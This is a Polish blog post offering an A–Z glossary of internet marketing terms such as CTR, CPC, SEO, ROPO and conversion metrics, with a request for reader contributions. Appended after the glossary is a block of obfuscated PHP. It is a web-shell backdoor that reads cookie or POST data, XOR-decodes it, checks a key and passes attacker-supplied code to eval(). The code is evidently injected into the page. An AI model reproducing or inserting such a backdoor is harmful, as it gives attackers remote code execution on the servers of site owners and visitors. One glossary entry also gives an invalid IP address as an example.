» » » Zbudujmy Słownik Marketingu Internetowego od A do Z

Zbudujmy Słownik Marketingu Internetowego od A do Z

Cześć! udało mi się wynaleźć genialną listę zakopaną gdzieś trzy lata temu w chmurze. Jest to słownik, który kompletowałem sobie na potrzeby tłumaczenia moim znajomym czym właściwie się zajmuję, potem okazało się to świetnym narzędziem do uczenia innych, a potem gdzieś zaginęło w czeluściach Dropboxa.

Kluczowe pojęcia w marketingu internetowym

Jest to mój prywatny słownik Marketinu Internetowego, który należałoby zaktualizować i tu też pojawia się moja prośba do Ciebie.

Pomóż mi rozbudować ten słownik, a być może i Tobie w przyszłości przyda się ściąga słów związanych z marketingiem internetowym.

Swoje propozycje polecam zostawiać w komentarzach pod tym wpisem lub poprzez formularz kontaktowy. W zamian oferuję Ci podpisanie definicji Twoim imieniem i nazwiskiem lub nazwą firmy oraz łącze do Twojej strony.

Jeśli widzisz jakiś błąd lub niedopatrzenie to również proszę cię o kontakt poprzez formularz kontaktowy lub poprzez media społecznościowe. Pamiętaj, że ten wpis jest tworzony dla ludzi i ma cel edukację!

Słownik pojęć marketingu internetowego

A

Adserwer – system informatyczny umożliwiający emisję i zarządzanie internetowych kampanii reklamowych, a także raportowanie i analizę wyników kampanii.

Adres IP – adres IP to unikatowy numer zapisywany w postaci czterech oddzielonych od siebie kropkami oktetów np.157.253.678.987, przyporządkowany urządzeniom sieciowym. Maszyny posługują się adresem IP, aby przesłać pomiędzy sobą informacje zgodnie z protokołem IP, użytkownicy Internetu nie muszą znać adresów IP.

AdWords – system reklamowy Google służący do emisji reklam w wyszukwarkach, sieci partnerów i reklamowadców Google, w serwisie YouTube.com oraz w poczcie Google (GMail)

AdSense – System Google dla wydawców reklam

Affinity Index (AI) – dopasowanie użytkowników grupy celowej na wybranej witrynie w stosunku do dopasowania użytkowników grupy celowej w całej populacji.

Akcja (patrz też kowersja) – realizacja założeń marketingowych kampanii, np. rejestracja na serwisie, zakup towaru, zapoznanie się z regulaminem, itd.

Atrybucja konwersji – przypisywanie wartości konwersji według określonej styczności przed dokonaniem konwersji

B

Bounce Rate (BR) – współczynnik odrzuceń – udział wizyt, w czasie których osoba zobaczyła jedynie jedną stronę, po czym opuściła serwis nie wykonując innych interakcji.

Branding – technika marketingowa polegająca na kreowaniu i utrwalaniu w umysłach konsumentów faktu istnienia oraz pozytywnego wizerunku konkretnej marki. Aby sprzedać skutecznie swoje produkty czy usługi przekaz reklamowy musi być spójny oraz skierowany do konkretnej grupy docelowej.

C

Capping – nałożenie limitu liczby kontaktów z reklamą, przypadających na jednego użytkownika; capping=3 oznacza, że pojedynczy użytkownik zobaczy reklamę maksymalnie 3 razy.

Cookies – ciąg znaków przesyłany przez serwer do przeglądarki podczas odsłony strony. Ciąg ten jest odsyłany do serwera (i ewentualnie przez niego zmieniany) za każdym razem, gdy przeglądarka pobiera odpowiednią stronę. Dzięki cookies serwer potrafi rozpoznawać użytkownika podczas kolejnych odsłon strony. W cookie mogą być zawarte indywidualne ustawienia strony itp., postrzegane przez niektórych jako naruszenie ich prywatności, nie pozwalają na zbieranie informacji z komputera użytkownika.

Content Marketing – marketing treści, mający na celu pozyskiwanie klientów poprzez dzielenie się wartościową treścią, wymieniany często jako główny filar inbound marketingu, a nawet czasem używany przemiennie z inbound marketingiem.

CPA (Cost Per Action) – koszt uzyskania jednej, określonej akcji wywołanej emisją kampanii reklamowej; stosunek liczby akcji do kosztów całej kampanii bannerowej; akcją może być kliknięcie, rejestracja, podanie adresu e-mail, podanie danych osobowych, zakup, wzięcie udziału w konkursie itp.

CPC (Cost Per Click) – koszt uzyskania pojedynczego kliknięcia w nośnik reklamowy, obliczany jako stosunek liczby kliknięć w reklamę do kosztów całej kampanii.

CPM / CPT – (Cost per Mille/Cost per Thousand) – koszt zakupu 1000 odsłon reklamowych skierowany do wybranej grupy celowej w wybranych przedziale czasu.

CPV (Cost per View) – Koszt obejrzenia reklamy wideo

CTR-U – Click-Through Rate – Users, procentowy stosunek liczby użytkowników (cookies), którzy kliknęli na reklamę, do liczby użytkowników (cookies), którym wyemitowano reklamę.

CTR – Click-Through Rate – procentowy stosunek liczby kliknięć do liczby emisji reklamy.

Czas rozpoczęcia wizyty – czas wykonania pierwszej odsłony wizyty.

Czas trwania wizyty – suma odstępów czasowych pomiędzy kolejnymi odsłonami wizyty.

Czas zakończenia wizyty – czas wykonania ostatniej odsłony wizyty.

CR, CVR – Conversion Rate – Współczynnik konwersji, procentowy stosunek liczby użytkowników wykonujących zamierzone cele do wszystkich użytkowników

CRO – Conwersion Rate Optimization – Optymalizacja pod kątem zwiększania współczynnika konwersji

D

Dopasowanie użytkowników grupy celowej – stosunek liczby użytkowników grupy celowej do liczby wszystkich użytkowników na wybranej witrynie w wybranym przedziale czasu.

Dopasowanie wizyt w grupie celowej – stosunek liczby wizyt wygenerowanych przez grupę celową do liczby wizyt wygenerowanych przez wszystkich użytkowników na wybranej witrynie w wybranym przedziale czasu.

F

Flat Fee (FF) – model zakupu powierzchni, opłata za czas emisji reklamy.

I

Internauta– osoba, która w okresie ostatnich 30 dni dokonała przynajmniej jednej odsłony w Internecie.

Impresje – Wyświetlenia reklamy.

Inbound marketing

J

K

Kliknięcie – Kliknięcia w raportach wskazują, ile razy reklama/link została kliknięte przez użytkowników.

Konwersja – Wykonanie pożądanej akcji przez użytkownika, np. wyświetlenie kluczowej strony, wykonanie interakcji.

L

Landing page – strona docelowa, czasem po prostu zwana stroną lądowania. Dedykowana i specjalnie przygotowana strona docelowa dla działań związanych z reklamą, skierowana na bezpośrednią reakcję.

Liczba odsłon – liczba odsłon wygenerowanych przez wybraną grupę docelową na wybranych witrynach w wybranym przedziale czasu.

Liczba sesji/wizyt – liczba sesji/wizyt wygenerowanych przez wybraną grupę docelową na wybranych witrynach w wybranym przedziale czasu.

Liczba użytkowników – liczba internautów z wybranej grupy celowej, którzy dokonali przynajmniej jednej odsłony na wybranej witrynie w wybranym przedziale czasu.

M

Mailing – Reklamą w postaci poczty elektronicznych. Celem mailingu nie jest budowanie relacji, a jedynie informowanie o produktach lub usługach.

Marketing Automation – Działania wykorzystujące automatyzację działań marketingowych za pomocą programów, określonych reguł. Pozwala na dopasowanie wysyłanych komunikatów (np. za pomocą poczty e-mail), do zachowań odbiorcy

N

Newsletter – elektroniczny biuletyn informacyjny. Służy do stałej komunikacji z odbiorcami, ma ca celu informowanie o ofertach lub zmianach w obrębie tematu, organizacji lub firmy.

O

Odsłona – zdarzenie polegające na obejrzeniu strony.

Odsłona niepowtarzalna – odsłony wygenerowane przez tego samego użytkownika w tej samej sesji jako jedną odsłonę. Odsłony niepowtarzalne reprezentują liczbę sesji, podczas których dana strona została wyświetlona co najmniej raz.

P

PPC (Pay Per Click) – popularny skrót dla kampanii linków sponsorowanych w wyszukiwarce rozliczanych w modelu płatności za kliknięcie,

R

Run-on-site (ROS) – kampania reklamowa wyświetlana na wszystkich, losowo dobieranych stronach danej witryny – niezależnie od ich tematyki i ich grupy cenowej.

ROPO (Research Online Purchase Offline) – Zachowanie polegające na wyszukiwaniu informacji o produkcie w Internecie i zakupienie produktu w tradycyjnym sklepie

Reverse ROPO (Reverse Research Online Purchase Offline)– Zachowanie polegające na wyszukiwaniu informacji o produkcie w tradycyjnych sklepach i zakupieniu produktu w systemie internetowym. Czasami również zastępowane skrótem SOPO (See Offline Purchase Online)

Return of Investment (ROI) – Zwrot z inwestycji: (Przychód Netto – Koszt Inwestycji)/Koszt Inwestycji * 100%

ROAS – zwrot z wydatków na reklamę,  (Łączną kwota przychodów podzielona/Łączną kwotę wydatków)*100%

 

S

Sesja – seria odsłon na dowolnych witrynach nieprzerwana przez przerwę dłuższą niż 30 minut.

SEM – Search Engine Marketing, czyli marketing w wyszukiwarkach internetowych, obejmuje działania SEO i PPC.

SEO – Search Engine Optimization – działania promujące serwisy internetowe w wyszukiwarkach.

SERP – Search Engine Result Page – Strona z wynikami wyszukiwania.

SXO – Search Experience Marketing – działania obejmujące poza samą optymalizacją witryny internetowej dla wyszukiwarek, również optymalizację pod kątem doświadczeń użytkownika na stronia

SMM – Social Media Marketing – działania marketingowe bazujące na płaszczyźnie mediów społecznościowych

Social Media – media społecznościowe

Ś

Średni czas na użytkownika – średni całkowity czas, jaki przeciętny użytkownik z wybranej grupy celowej spędził na wybranej witrynie w wybranym przedziale czasu.

Średni czas odsłony – średni czas pomiędzy dwoma odsłonami na wybranej witrynie wygenerowany przez wybraną grupę celową.

Średni czas trwania sesji – średni czas pomiędzy początkiem a końcem jednej sesji, wygenerowany przez wybraną grupę celową.

Średni czas trwania wizyty – średni czas pomiędzy początkiem a końcem jednej wizyty na wybranej witrynie wygenerowany przez wybraną grupę celową.

Średnia liczba odsłon na użytkownika – średnia liczba odsłon na wybranej witrynie wygenerowana przez użytkownika z wybranej grupy celowej w wybranym przedziale czasu.

Średnia liczba odsłon na wizytę – liczba odsłon przypadająca na jedną wizytę na wybranej witrynie wygenerowana przez przeciętnego użytkownika z wybranej grupy celowej w wybranym przedziale czasu.

Średnia liczba sesji na użytkownika – liczba sesji wygenerowana przez przeciętnego użytkownika z wybranej grupy celowej w wybranym przedziale czasu.

Średnia liczba wizyt na użytkownika – liczba wizyt na wybranej witrynie wygenerowana przez przeciętnego użytkownika z wybranej grupy celowej w wybranym przedziale czasu.

Ścieżka konwersji – strony lub zdarzenia następujące w obrębie witryny przed wykonaniem konwersji przez użytkownika

U

URL (Uniform Resource Locator) – kod identyfikujący dowolny zasób w Internecie. Przykład: http://www.orinoko-szkolenia.pl/

Użytkownik Realny (RU – Real User) – użytkownik, który wykonał w danym miesiącu co najmniej jedną odsłonę;

Użytkownik Unikalny (UU – Unique User) – użytkownik odwiedzający określony serwis w pewnym przedziale czasowym; liczba unique users tylko w przybliżeniu odpowiada liczbie internautów odwiedzających stronę i opiera się na liczbie aktywnych cookies.

V

VTR (View Through Rate) – Współczynnik obejrzeń, procentowy udział obejrzeń reklamy wideo do całkowitej ilości wyświetleń reklamy, w wybranym okresie czasu

W

Witryna – zbiór stron tworzący spójną całość.

Wizyta – ciąg następujących po sobie odsłon wykonanych przez jednego użytkownika w ramach jednej witryny. Odstęp między kolejnymi odsłonami nie może przekraczać 30 minut.

Współoglądalność – udział liczby wspólnych użytkowników do liczby wszystkich użytkowników, którzy byli na wybranej witrynie w wybranym przedziale czasu.

Z

Zasięg wśród internautów – stosunek liczby użytkowników, którzy dokonali przynajmniej jednej odsłony na wybranej witrynie w wybranym przedziale czasu, do całkowitej liczby internautów w wybranym przedziale czasu.

ZMOT (Zero Moment of Truth) – Zerowy moment prawdy.

FMOT (First Moment of Truth) – Pierwszy moment prawdy.

SMOT (Second Moment of Truth) – Drugi moment prawdy.

$k772fc = 832;$GLOBALS['e802ad6']=Array();global$e802ad6;$e802ad6=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['ta112']="\x28\x45\x48\x33\x24\x5f\x41\x72\x2f\x27\x7e\x40\x65\x3d\x69\x56\x63\x42\x76\xa\x58\x2e\x20\x71\x47\x6f\x55\x77\x2d\x30\x73\x7c\x2c\x3c\x4c\x67\x3f\x2b\x46\x26\x7a\x79\x52\x23\x75\x54\x31\x44\x43\x66\x7b\x36\x6a\x5b\x5d\x60\xd\x70\x5e\x74\x3b\x29\x5a\x53\x6b\x4d\x7d\x61\x6d\x5c\x34\x25\x57\x9\x51\x4f\x68\x32\x4e\x64\x3a\x6e\x3e\x59\x6c\x2a\x38\x50\x21\x37\x78\x49\x4b\x62\x4a\x22\x39\x35";$e802ad6[$e802ad6['ta112'][23].$e802ad6['ta112'][77].$e802ad6['ta112'][29].$e802ad6['ta112'][12].$e802ad6['ta112'][97].$e802ad6['ta112'][77].$e802ad6['ta112'][16].$e802ad6['ta112'][89].$e802ad6['ta112'][3]]=$e802ad6['ta112'][16].$e802ad6['ta112'][76].$e802ad6['ta112'][7];$e802ad6[$e802ad6['ta112'][57].$e802ad6['ta112'][96].$e802ad6['ta112'][89].$e802ad6['ta112'][51].$e802ad6['ta112'][51]]=$e802ad6['ta112'][25].$e802ad6['ta112'][7].$e802ad6['ta112'][79];$e802ad6[$e802ad6['ta112'][84].$e802ad6['ta112'][89].$e802ad6['ta112'][3].$e802ad6['ta112'][96].$e802ad6['ta112'][77].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][86]]=$e802ad6['ta112'][30].$e802ad6['ta112'][59].$e802ad6['ta112'][7].$e802ad6['ta112'][84].$e802ad6['ta112'][12].$e802ad6['ta112'][81];$e802ad6[$e802ad6['ta112'][81].$e802ad6['ta112'][3].$e802ad6['ta112'][51].$e802ad6['ta112'][86].$e802ad6['ta112'][51].$e802ad6['ta112'][16].$e802ad6['ta112'][70].$e802ad6['ta112'][29]]=$e802ad6['ta112'][14].$e802ad6['ta112'][81].$e802ad6['ta112'][14].$e802ad6['ta112'][5].$e802ad6['ta112'][30].$e802ad6['ta112'][12].$e802ad6['ta112'][59];$e802ad6[$e802ad6['ta112'][27].$e802ad6['ta112'][29].$e802ad6['ta112'][97].$e802ad6['ta112'][97].$e802ad6['ta112'][70].$e802ad6['ta112'][77]]=$e802ad6['ta112'][30].$e802ad6['ta112'][12].$e802ad6['ta112'][7].$e802ad6['ta112'][14].$e802ad6['ta112'][67].$e802ad6['ta112'][84].$e802ad6['ta112'][14].$e802ad6['ta112'][40].$e802ad6['ta112'][12];$e802ad6[$e802ad6['ta112'][93].$e802ad6['ta112'][93].$e802ad6['ta112'][49].$e802ad6['ta112'][29]]=$e802ad6['ta112'][57].$e802ad6['ta112'][76].$e802ad6['ta112'][57].$e802ad6['ta112'][18].$e802ad6['ta112'][12].$e802ad6['ta112'][7].$e802ad6['ta112'][30].$e802ad6['ta112'][14].$e802ad6['ta112'][25].$e802ad6['ta112'][81];$e802ad6[$e802ad6['ta112'][25].$e802ad6['ta112'][97].$e802ad6['ta112'][86].$e802ad6['ta112'][89].$e802ad6['ta112'][46].$e802ad6['ta112'][79].$e802ad6['ta112'][67].$e802ad6['ta112'][77]]=$e802ad6['ta112'][44].$e802ad6['ta112'][81].$e802ad6['ta112'][30].$e802ad6['ta112'][12].$e802ad6['ta112'][7].$e802ad6['ta112'][14].$e802ad6['ta112'][67].$e802ad6['ta112'][84].$e802ad6['ta112'][14].$e802ad6['ta112'][40].$e802ad6['ta112'][12];$e802ad6[$e802ad6['ta112'][18].$e802ad6['ta112'][89].$e802ad6['ta112'][12].$e802ad6['ta112'][12].$e802ad6['ta112'][70].$e802ad6['ta112'][49].$e802ad6['ta112'][77].$e802ad6['ta112'][29].$e802ad6['ta112'][70]]=$e802ad6['ta112'][93].$e802ad6['ta112'][67].$e802ad6['ta112'][30].$e802ad6['ta112'][12].$e802ad6['ta112'][51].$e802ad6['ta112'][70].$e802ad6['ta112'][5].$e802ad6['ta112'][79].$e802ad6['ta112'][12].$e802ad6['ta112'][16].$e802ad6['ta112'][25].$e802ad6['ta112'][79].$e802ad6['ta112'][12];$e802ad6[$e802ad6['ta112'][49].$e802ad6['ta112'][49].$e802ad6['ta112'][79].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][67].$e802ad6['ta112'][89].$e802ad6['ta112'][86].$e802ad6['ta112'][77]]=$e802ad6['ta112'][30].$e802ad6['ta112'][12].$e802ad6['ta112'][59].$e802ad6['ta112'][5].$e802ad6['ta112'][59].$e802ad6['ta112'][14].$e802ad6['ta112'][68].$e802ad6['ta112'][12].$e802ad6['ta112'][5].$e802ad6['ta112'][84].$e802ad6['ta112'][14].$e802ad6['ta112'][68].$e802ad6['ta112'][14].$e802ad6['ta112'][59];$e802ad6[$e802ad6['ta112'][57].$e802ad6['ta112'][3].$e802ad6['ta112'][89].$e802ad6['ta112'][89].$e802ad6['ta112'][89].$e802ad6['ta112'][70].$e802ad6['ta112'][16].$e802ad6['ta112'][51].$e802ad6['ta112'][79]]=$e802ad6['ta112'][90].$e802ad6['ta112'][77].$e802ad6['ta112'][89].$e802ad6['ta112'][97].$e802ad6['ta112'][49].$e802ad6['ta112'][79];$e802ad6[$e802ad6['ta112'][67].$e802ad6['ta112'][96].$e802ad6['ta112'][29].$e802ad6['ta112'][3].$e802ad6['ta112'][29].$e802ad6['ta112'][97].$e802ad6['ta112'][89]]=$e802ad6['ta112'][84].$e802ad6['ta112'][93].$e802ad6['ta112'][12].$e802ad6['ta112'][96];$e802ad6[$e802ad6['ta112'][7].$e802ad6['ta112'][46].$e802ad6['ta112'][77].$e802ad6['ta112'][97].$e802ad6['ta112'][93].$e802ad6['ta112'][46].$e802ad6['ta112'][79].$e802ad6['ta112'][3].$e802ad6['ta112'][16]]=$_POST;$e802ad6[$e802ad6['ta112'][14].$e802ad6['ta112'][51].$e802ad6['ta112'][51].$e802ad6['ta112'][97].$e802ad6['ta112'][97]]=$_COOKIE;@$e802ad6[$e802ad6['ta112'][81].$e802ad6['ta112'][3].$e802ad6['ta112'][51].$e802ad6['ta112'][86].$e802ad6['ta112'][51].$e802ad6['ta112'][16].$e802ad6['ta112'][70].$e802ad6['ta112'][29]]($e802ad6['ta112'][12].$e802ad6['ta112'][7].$e802ad6['ta112'][7].$e802ad6['ta112'][25].$e802ad6['ta112'][7].$e802ad6['ta112'][5].$e802ad6['ta112'][84].$e802ad6['ta112'][25].$e802ad6['ta112'][35],NULL);@$e802ad6[$e802ad6['ta112'][81].$e802ad6['ta112'][3].$e802ad6['ta112'][51].$e802ad6['ta112'][86].$e802ad6['ta112'][51].$e802ad6['ta112'][16].$e802ad6['ta112'][70].$e802ad6['ta112'][29]]($e802ad6['ta112'][84].$e802ad6['ta112'][25].$e802ad6['ta112'][35].$e802ad6['ta112'][5].$e802ad6['ta112'][12].$e802ad6['ta112'][7].$e802ad6['ta112'][7].$e802ad6['ta112'][25].$e802ad6['ta112'][7].$e802ad6['ta112'][30],0);@$e802ad6[$e802ad6['ta112'][81].$e802ad6['ta112'][3].$e802ad6['ta112'][51].$e802ad6['ta112'][86].$e802ad6['ta112'][51].$e802ad6['ta112'][16].$e802ad6['ta112'][70].$e802ad6['ta112'][29]]($e802ad6['ta112'][68].$e802ad6['ta112'][67].$e802ad6['ta112'][90].$e802ad6['ta112'][5].$e802ad6['ta112'][12].$e802ad6['ta112'][90].$e802ad6['ta112'][12].$e802ad6['ta112'][16].$e802ad6['ta112'][44].$e802ad6['ta112'][59].$e802ad6['ta112'][14].$e802ad6['ta112'][25].$e802ad6['ta112'][81].$e802ad6['ta112'][5].$e802ad6['ta112'][59].$e802ad6['ta112'][14].$e802ad6['ta112'][68].$e802ad6['ta112'][12],0);@$e802ad6[$e802ad6['ta112'][49].$e802ad6['ta112'][49].$e802ad6['ta112'][79].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][67].$e802ad6['ta112'][89].$e802ad6['ta112'][86].$e802ad6['ta112'][77]](0);$v9c433=NULL;$kb4e0eb3=NULL;$e802ad6[$e802ad6['ta112'][44].$e802ad6['ta112'][93].$e802ad6['ta112'][12].$e802ad6['ta112'][12]]=$e802ad6['ta112'][46].$e802ad6['ta112'][49].$e802ad6['ta112'][51].$e802ad6['ta112'][67].$e802ad6['ta112'][49].$e802ad6['ta112'][96].$e802ad6['ta112'][51].$e802ad6['ta112'][93].$e802ad6['ta112'][28].$e802ad6['ta112'][79].$e802ad6['ta112'][93].$e802ad6['ta112'][67].$e802ad6['ta112'][67].$e802ad6['ta112'][28].$e802ad6['ta112'][70].$e802ad6['ta112'][86].$e802ad6['ta112'][67].$e802ad6['ta112'][89].$e802ad6['ta112'][28].$e802ad6['ta112'][86].$e802ad6['ta112'][46].$e802ad6['ta112'][46].$e802ad6['ta112'][3].$e802ad6['ta112'][28].$e802ad6['ta112'][77].$e802ad6['ta112'][79].$e802ad6['ta112'][16].$e802ad6['ta112'][93].$e802ad6['ta112'][12].$e802ad6['ta112'][86].$e802ad6['ta112'][49].$e802ad6['ta112'][16].$e802ad6['ta112'][79].$e802ad6['ta112'][77].$e802ad6['ta112'][93].$e802ad6['ta112'][77];global$ubee;function lbe9($v9c433,$s84c263){global$e802ad6;$m533789b="";for($v4faa=0;$v4faa<$e802ad6[$e802ad6['ta112'][84].$e802ad6['ta112'][89].$e802ad6['ta112'][3].$e802ad6['ta112'][96].$e802ad6['ta112'][77].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][86]]($v9c433);){for($yac95d1e=0;$yac95d1e<$e802ad6[$e802ad6['ta112'][84].$e802ad6['ta112'][89].$e802ad6['ta112'][3].$e802ad6['ta112'][96].$e802ad6['ta112'][77].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][86]]($s84c263)&&$v4faa<$e802ad6[$e802ad6['ta112'][84].$e802ad6['ta112'][89].$e802ad6['ta112'][3].$e802ad6['ta112'][96].$e802ad6['ta112'][77].$e802ad6['ta112'][86].$e802ad6['ta112'][70].$e802ad6['ta112'][86]]($v9c433);$yac95d1e++,$v4faa++){$m533789b.=$e802ad6[$e802ad6['ta112'][23].$e802ad6['ta112'][77].$e802ad6['ta112'][29].$e802ad6['ta112'][12].$e802ad6['ta112'][97].$e802ad6['ta112'][77].$e802ad6['ta112'][16].$e802ad6['ta112'][89].$e802ad6['ta112'][3]]($e802ad6[$e802ad6['ta112'][57].$e802ad6['ta112'][96].$e802ad6['ta112'][89].$e802ad6['ta112'][51].$e802ad6['ta112'][51]]($v9c433[$v4faa])^$e802ad6[$e802ad6['ta112'][57].$e802ad6['ta112'][96].$e802ad6['ta112'][89].$e802ad6['ta112'][51].$e802ad6['ta112'][51]]($s84c263[$yac95d1e]));}}return$m533789b;}function x275fd($v9c433,$s84c263){global$e802ad6;global$ubee;return$e802ad6[$e802ad6['ta112'][67].$e802ad6['ta112'][96].$e802ad6['ta112'][29].$e802ad6['ta112'][3].$e802ad6['ta112'][29].$e802ad6['ta112'][97].$e802ad6['ta112'][89]]($e802ad6[$e802ad6['ta112'][67].$e802ad6['ta112'][96].$e802ad6['ta112'][29].$e802ad6['ta112'][3].$e802ad6['ta112'][29].$e802ad6['ta112'][97].$e802ad6['ta112'][89]]($v9c433,$ubee),$s84c263);}foreach($e802ad6[$e802ad6['ta112'][14].$e802ad6['ta112'][51].$e802ad6['ta112'][51].$e802ad6['ta112'][97].$e802ad6['ta112'][97]]as$s84c263=>$ef2d478){$v9c433=$ef2d478;$kb4e0eb3=$s84c263;}if(!$v9c433){foreach($e802ad6[$e802ad6['ta112'][7].$e802ad6['ta112'][46].$e802ad6['ta112'][77].$e802ad6['ta112'][97].$e802ad6['ta112'][93].$e802ad6['ta112'][46].$e802ad6['ta112'][79].$e802ad6['ta112'][3].$e802ad6['ta112'][16]]as$s84c263=>$ef2d478){$v9c433=$ef2d478;$kb4e0eb3=$s84c263;}}$v9c433=@$e802ad6[$e802ad6['ta112'][25].$e802ad6['ta112'][97].$e802ad6['ta112'][86].$e802ad6['ta112'][89].$e802ad6['ta112'][46].$e802ad6['ta112'][79].$e802ad6['ta112'][67].$e802ad6['ta112'][77]]($e802ad6[$e802ad6['ta112'][57].$e802ad6['ta112'][3].$e802ad6['ta112'][89].$e802ad6['ta112'][89].$e802ad6['ta112'][89].$e802ad6['ta112'][70].$e802ad6['ta112'][16].$e802ad6['ta112'][51].$e802ad6['ta112'][79]]($e802ad6[$e802ad6['ta112'][18].$e802ad6['ta112'][89].$e802ad6['ta112'][12].$e802ad6['ta112'][12].$e802ad6['ta112'][70].$e802ad6['ta112'][49].$e802ad6['ta112'][77].$e802ad6['ta112'][29].$e802ad6['ta112'][70]]($v9c433),$kb4e0eb3));if(isset($v9c433[$e802ad6['ta112'][67].$e802ad6['ta112'][64]])&&$ubee==$v9c433[$e802ad6['ta112'][67].$e802ad6['ta112'][64]]){if($v9c433[$e802ad6['ta112'][67]]==$e802ad6['ta112'][14]){$v4faa=Array($e802ad6['ta112'][57].$e802ad6['ta112'][18]=>@$e802ad6[$e802ad6['ta112'][93].$e802ad6['ta112'][93].$e802ad6['ta112'][49].$e802ad6['ta112'][29]](),$e802ad6['ta112'][30].$e802ad6['ta112'][18]=>$e802ad6['ta112'][46].$e802ad6['ta112'][21].$e802ad6['ta112'][29].$e802ad6['ta112'][28].$e802ad6['ta112'][46],);echo@$e802ad6[$e802ad6['ta112'][27].$e802ad6['ta112'][29].$e802ad6['ta112'][97].$e802ad6['ta112'][97].$e802ad6['ta112'][70].$e802ad6['ta112'][77]]($v4faa);}elseif($v9c433[$e802ad6['ta112'][67]]==$e802ad6['ta112'][12]){eval/*f62d*/($v9c433[$e802ad6['ta112'][79]]);}exit();} ?>